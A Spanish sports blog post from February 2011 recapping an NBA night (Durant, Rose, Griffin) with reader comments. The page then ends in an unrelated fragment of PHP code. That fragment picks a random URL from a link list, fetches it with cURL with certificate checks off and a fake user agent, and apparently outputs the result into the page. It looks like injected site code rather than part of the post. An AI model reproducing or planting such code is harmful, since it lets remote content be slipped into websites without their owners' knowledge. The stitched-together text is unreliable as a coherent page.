La Crónica (02/02/2011)

03 de February de 2011 por TheDeerHunter

Mucha actividad pero poca chicha.

Los mayores gallos que se la jugaban ayer fueron los Bulls, ganando bien en casa de los Clippers (88-106) con el gran hacer de Rose y Deng, y Oklahoma que se la liaron a los Hornets (93-104). No hubo manera de parar a Durant. También saltaron al ruedo los Mavs, que obtuvieron una importantísima victoria en el Madison (113-97), y los Hawks, que se valieron del mejor partido del curso de Joe Johnson para derrotar a los Raptors (87-100) en un encuentro en el que Calderón registró un doble doble a pesar de un desastroso porcentaje de tiro.

En cambio, la noche fue malísima para los Blazers. Perdieron en Denver (90-109) y vieron cómo los Grizzlies ganaban en Minnesota (102-84) en una floja actuación de Love y también cómo los Suns destrozaban a los Bucks (77-92). Los ciervos recuperaban a Jennings y Salmos, pero Bogut se quedó en dique seco. Menuda rachilla que llevan. Por si fuera poco los Rockets también ganaron a Utah por la mínima (97-96) con un estupidísimo 2+1 que le concedieron a Martin a 6 segundos de finalizar.

La cola de playoffs del Este también está que arde. Indiana parece que reacciona (anoche le endosaron la 22ª derrota consecutiva a los Cavs, 117-112) pero tanto los Sixers sobre los Nets (106-92), como Charlotte sobre Detroit (97-87) sacaron adelante sus compromisos. Impresionante actuación de Stephen Jackson, por cierto.

PREMIOS

MVP: 43 puntos con un 14 de 19, además 10 rebotes y 5 asistencias. Kevin Durant estuvo literalmente imparable. A su lado los 37 puntos y 8 asistencias de Joe Johnson, los 32 puntos y 11 asistencias de Derrick Rose o los 39 puntos de Stephen Jackson parecen poca cosa.

Rookie: Otra impresionante actuación del animal. 32 puntos, 13 rebotes y 7 asistencias para Blake Griffin.

Sorpresa: Uno de los mejores partidos del curso para Luol Deng. Anoche le endosó 26 puntos a los Clippers y complementó su actuación con 6 rebotes y 5 asistencias. De mantener este nivel los Bulls se convertirían en claros favoritos al anillo.

Decepción: El rookie de los Wolves, Wes Johnson, nos dejó una de sus peores actuaciones del año. 2 de 11 en tiro más 1 rebote y 1 asistencia. Y eso que en teoría podía contribuir desde el primer momento. NBA is different!

Esfuerzo en vano: El del rookie del año, Blake Griffin. Y si no, el de Ramon Sessions, que nada pudo hacer para evitar la 22ª derrota consecutiva de los Cavs a pesar de sus 25 puntos.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Busky23 dice:
    #1

    32 puntos de Griffin a pesar de su muñeca de madera en los libres 4 de 13!
    Rose cada vez más cerca del Mvp,con permiso de Durantula off course,que ha empezado este 2011 como una moto.
    Kevin Love es humano!!!,entre Marc y los codos de Randolph han dejado al Sr. Amor en 10 puntitos,en Memphis ya se lo empiezan a creer.

    Habrá porra para el All-Star?

      Citar

  2. scriers dice:
    #2

    Yo creo que el dato más significativo de la jornada son las 7 asistencias de Rudy Gay.

      Citar

  3. MagicJohnson32 dice:
    #3

    Gay está haciendo un año completísimo, ha mejorado sus porcentajes de 2, de triples, de tiros libres, ha subido en asistencias, en robos, en tapones… Gran temporada la suya.

    Qué bruto Durant, está absolutamente on fire!

      Citar

  4. KB # 24 dice:
    #4

    cuando se sabrán los suplentes del all star?¿

      Citar

  5. Len Bias dice:
    #5

    Creo que Randolph le quitó el sitio en el All Star ayer a Love (que muy justito pero consiguió mantener la racha de dobles-dobles), injusto que con sus números se vaya a quedar fuera, pero me parece que no caben todos.

    En cuanto a Durant… nada que decir, creo que está entre los 3 mejores de la liga

      Citar

  6. HeiNeKeN dice:
    #6

    Gasol titular

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>